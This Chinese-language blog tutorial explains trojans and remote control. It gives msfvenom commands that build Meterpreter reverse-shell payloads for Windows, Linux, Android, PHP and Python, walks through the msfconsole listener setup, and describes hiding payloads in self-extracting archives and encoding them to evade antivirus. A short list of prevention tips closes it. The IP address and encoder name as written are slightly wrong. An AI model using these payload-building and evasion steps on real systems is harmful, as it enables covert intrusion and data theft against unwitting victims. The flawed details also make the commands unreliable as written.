浅谈木马

浅谈木马远控

在听过某网安教育关于浅谈的公开课后，结合本人学过的东西，以及自己实践过的经历。在此分享下木马对我们的影响。

环境：

攻击者：kali

目标主机：Windows

一、了解木马

1．木马，又称为特洛伊木马

特洛伊木马(Trojan Horse)，这个名字源于公元前十二世纪希腊与特洛伊之间的一场战争。古希腊围攻特洛伊许久却无法攻下，于是有人想到了个办法。制作了一个很高很大的木马作为战神马，内部可装士兵，佯攻几天后装作无功而返，留下木马。特洛伊解围后认为自己胜利了，还看到了敌人留下的木马，便作为战利品收入城中，全城举杯庆祝。到了午夜时分，藏匿于木马中的士兵便打开了城门，四处纵火，城外伏兵涌入，很容易便得到了城池。   在如今，我们常将寄宿在计算机中的未授权的远程控制程序称为特洛伊木马。它可以计算机管理员未发觉的情况下执行命令、泄露用于信息、甚至可以窃取管理员用户权限。如今已成为黑客常用的工具之一。

2．木马原理、结构

原理：特洛伊木马是一道程序，藏匿于计算机中，通过对开启计算机的某一端口进行监听，在接受到数据后进行识别，再对计算机执行相应的操作。

其本质是占用一个端口与攻击者进行通信的网络程序。

结构：

（1）客户端

客户端程序

客户端程序是攻击者的控制台，它负责远程遥控指挥。

（2）服务器端

服务器端程序

服务器端程序即木马程序，它隐藏安装在目标主机上，目标主机也称为肉鸡。

二、制作简易木马

此处我们利用msfvenom制作木马程序。

Windows木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f exe -o muma.exe

-p 载荷(payload)，用于反弹shell

lhost=       这里写的是攻击者的IP

lport=       这里写的是攻击者主机上用于监听的端口（任意未被占用的端口）

-f 文件类型

-o 输出的文件名

Linux木马

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f elf -o muma.elf

android木马

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -o muma.apk

php木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.php

python木马

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.py

利用msfvenom制作木马时，选择payload和文件类型需要注意。

三、木马的危害

由于本文探讨木马远控，这里就暂时省略文件上传、命令执行下载木马等方式将木马传入目标主机的讨论。

这里我们直接将制作好的木马放在一个Windows主机中(网络互通)，然后在客户端(攻击者)利用msfconsole开启监听

msfconsole

use exploit/multi/handler       #进入监听模块

set payload windows/meterpreter/reverse_tcp       #加载payload模块

set lhost       本机IP

set lport 4444

exploit/run

开启监听后，我们在目标主机上运行一下木马程序。

此时我们可以看到已经连接上了木马程序。

当我们的电脑被木马控制后，我们电脑中的信息可能会被泄露，包括系统信息、用户存储在电脑上的数据信息等。

除过电脑上的信息可能会被攻击者窃取，攻击者还可能控制电脑对数据进行删改，可以上传和下载文件，盗取计算机中的密码等操作。甚至可以以感染了木马的主机为跳板，攻击该网络下的其他主机等操作。

可能到了这里有人会觉得这些木马很简单，很容易就被目标发现。

攻击者想要在不被发现的情况下在目标主机上种下木马，可以进行木马捆绑、免杀、伪装等操作。

木马捆绑：

制作自解压木马(准备一个木马、一个图片、一个压缩软件即可)

攻击者可以制作一个自解压木马，诱导目标解压压缩包。在目标解压压缩文件的同时会运行压缩文件里的木马程序，从而被控制。(当你从一些奇怪的地方下载了一些奇怪的压缩包的时候，可能这个压缩包里面就捆绑了木马，当你一解压，它会自动运行里面的木马程序。)

可能很多时候我们的杀毒软件够强大，可以检测到捆绑了木马的压缩文件。然而攻击者还有方法。

木马免杀：

攻击者可以对木马程序进行一些免杀操作，从而绕过一些防护软件。

常用到的免杀方法有：编码加密、加壳(压缩算法)、利用一些工具进行免杀等。

在利用msfvenom制作木马时，可以使用-e x86/shikata_ganai参数进行加密。

Msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ganai -i 30 -b ’\x00’ lhost=hackIP lport=4444 -f exe -o muma.exe

-e 编码的方式 -i 编码次数 -b不使用十六进制00

一些其他的编码方式，可以使用msfvenom -l encoders命令查看

四、木马防护

1．木马的传播途径

（1）利用下载进行传播

（2）利用系统漏洞传播

（3）利用邮件传播

（4）利用即使通信传播

（5）利用网页传播

（6）利用蠕虫病毒传播等

2．木马的防范与查杀

（1）首先安装杀毒软件

（2）不执行奇怪的软件，使用的软件尽量从官方下载安装

（3）不随便打开奇怪的邮件

（4）尽量少使用或者不使用共享文件夹

（5）不点击奇怪的链接等

本文只是简单讨论下木马远控，为了提高自己和身边亲友的安全意识，后期会有对木马的深入探讨。本文可能会有很多遗漏的地方和不对的地方，欢迎各位大佬指点，文中很多是个人观点，也欢迎各位朋友发表自己的观点看法。

欢迎投稿